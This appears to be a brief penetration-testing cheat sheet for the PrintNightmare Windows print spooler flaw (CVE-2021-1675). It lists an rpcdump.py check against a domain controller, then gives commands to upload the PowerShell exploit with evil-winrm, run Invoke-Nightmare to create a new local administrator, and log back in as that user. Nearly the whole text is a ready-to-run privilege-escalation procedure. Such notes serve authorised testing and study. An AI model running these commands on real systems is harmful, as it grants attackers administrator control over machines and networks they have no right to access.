Print Nightmare

cube0x0 RCE

calebstewart LPE

rpcdump.py @<DC_ip> | egrep 'MS-RPRN|MS-PAR'

we need authenticated user access to run PrintNightmare

Using evil-winrm upload the exploit to the target

Import-Module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser "username" -NewPassword "pass" (the user will be local admin)

evil-winrm -I <ip> -u user -p pass

Last updated